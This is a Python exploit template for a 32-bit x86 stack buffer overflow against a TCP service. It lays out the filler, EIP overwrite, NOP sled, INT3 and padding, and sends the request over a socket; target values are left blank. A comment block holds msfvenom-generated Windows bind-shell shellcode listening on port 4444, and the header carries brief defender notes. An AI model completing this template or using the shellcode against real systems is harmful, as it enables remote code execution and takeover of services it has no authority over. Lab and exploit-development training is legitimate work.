#!/usr/bin/python3
# Skeleton for a 32-bit x86 (EIP-overwrite) buffer-overflow proof of concept
# against a TCP service. Every target-specific value below is deliberately
# left blank, so the file neither parses nor runs as published; what it shows
# is the fixed layout of such a request: command prefix, 'A' filler up to the
# value that lands in EIP, the overwritten EIP, a NOP sled, an INT3
# breakpoint, shellcode, 'F' padding and a CRLF terminator.
#
# Defender notes: one request carrying long runs of 0x41 ('A') or 0x46 ('F'),
# a run of 0x90 (NOP sled) and a 0xCC byte is a well-known network-IDS
# signature for this payload shape. A service that crashes on such input
# needs a bounds check on its receive buffer plus the usual platform
# mitigations (stack canaries, DEP/NX, ASLR); nothing in this template
# addresses any of them.
import socket
dest = ''  # host of the service under test (blank placeholder)
# TCP port of that service (blank placeholder; the file will not parse until filled)
dport =
cmd = ''  # protocol command sent immediately before the overflowing data (blank)
# total length of everything between cmd and end; the padding below is derived from it
total_bytes =
# number of filler bytes that precede the value ending up in EIP
distance_to_eip =
eip_overwrite = '\x\x\x\x' # placeholder for the 4-byte EIP value. Remember endianness (x86 is little-endian)
end = '\r\n'  # line terminator that closes the request
shellcode = '' # Shellcode can be omitted as a test, padding will be put in its spot, as a placeholder
# The below should be okay
buffer_to_eip = distance_to_eip * 'A'  # filler up to the EIP slot
nop_sled = '\x90' * 16  # 16-byte NOP (0x90) sled
break_instruction = '\xcc'  # 0xCC (x86 INT3) placed where execution is expected to arrive
# fills whatever is left so that the bytes between cmd and end total exactly total_bytes
padding = 'F' * (total_bytes - distance_to_eip - len(eip_overwrite) - len(nop_sled) - len(break_instruction) - len(shellcode))
# the complete request: everything after cmd and before end is the overflow
attack = cmd + buffer_to_eip + eip_overwrite + nop_sled + break_instruction + shellcode + padding + end
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # plain TCP, no timeout set
s.connect((dest, dport))
s.recv(100)  # reads and discards up to 100 bytes (presumably a banner) — TODO confirm the service sends one
s.sendall(attack.encode())
print(s.recv(100))  # up to 100 bytes of whatever the service answers
s.close()
# Sample shellcode generated via `msfvenom --payload windows/shell_bind_tcp -b '\x00' -e x86/shikata_ga_nai`
# This opens a bind shell on 4444
'''
("\xbb\xa1\x09\x04\x9a\xda\xdc\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
"\x56\x31\x5a\x13\x83\xc2\x04\x03\x5a\xae\xeb\xf1\x66\x58\x62"
"\xf9\x96\x98\x15\x73\x73\xa9\x07\xe7\xf7\x9b\x97\x63\x55\x17"
"\x53\x21\x4e\xac\x11\xee\x61\x05\x9f\xc8\x4c\x96\x11\xd5\x03"
"\x54\x33\xa9\x59\x88\x93\x90\x91\xdd\xd2\xd5\xcc\x2d\x86\x8e"
"\x9b\x9f\x37\xba\xde\x23\x39\x6c\x55\x1b\x41\x09\xaa\xef\xfb"
"\x10\xfb\x5f\x77\x5a\xe3\xd4\xdf\x7b\x12\x39\x3c\x47\x5d\x36"
"\xf7\x33\x5c\x9e\xc9\xbc\x6e\xde\x86\x82\x5e\xd3\xd7\xc3\x59"
"\x0b\xa2\x3f\x9a\xb6\xb5\xfb\xe0\x6c\x33\x1e\x42\xe7\xe3\xfa"
"\x72\x24\x75\x88\x79\x81\xf1\xd6\x9d\x14\xd5\x6c\x99\x9d\xd8"
"\xa2\x2b\xe5\xfe\x66\x77\xbe\x9f\x3f\xdd\x11\x9f\x20\xb9\xce"
"\x05\x2a\x28\x1b\x3f\x71\x25\xe8\x72\x8a\xb5\x66\x04\xf9\x87"
"\x29\xbe\x95\xab\xa2\x18\x61\xcb\x99\xdd\xfd\x32\x21\x1e\xd7"
"\xf0\x75\x4e\x4f\xd0\xf5\x05\x8f\xdd\x20\x89\xdf\x71\x9a\x6a"
"\xb0\x31\x4a\x03\xda\xbd\xb5\x33\xe5\x17\xc0\x73\x2b\x43\x81"
"\x13\x4e\x73\x34\xb8\xc7\x95\x5c\x50\x8e\x0e\xc8\x92\xf5\x86"
"\x6f\xec\xdf\xba\x38\x7a\x57\xd5\xfe\x85\x68\xf3\xad\x2a\xc0"
"\x94\x25\x21\xd5\x85\x3a\x6c\x7d\xcf\x03\xe7\xf7\xa1\xc6\x99"
"\x08\xe8\xb0\x3a\x9a\x77\x40\x34\x87\x2f\x17\x11\x79\x26\xfd"
"\x8f\x20\x90\xe3\x4d\xb4\xdb\xa7\x89\x05\xe5\x26\x5f\x31\xc1"
"\x38\x99\xba\x4d\x6c\x75\xed\x1b\xda\x33\x47\xea\xb4\xed\x34"
"\xa4\x50\x6b\x77\x77\x26\x74\x52\x01\xc6\xc5\x0b\x54\xf9\xea"
"\xdb\x50\x82\x16\x7c\x9e\x59\x93\x8c\xd5\xc3\xb2\x04\xb0\x96"
"\x86\x48\x43\x4d\xc4\x74\xc0\x67\xb5\x82\xd8\x02\xb0\xcf\x5e"
"\xff\xc8\x40\x0b\xff\x7f\x60\x1e")
'''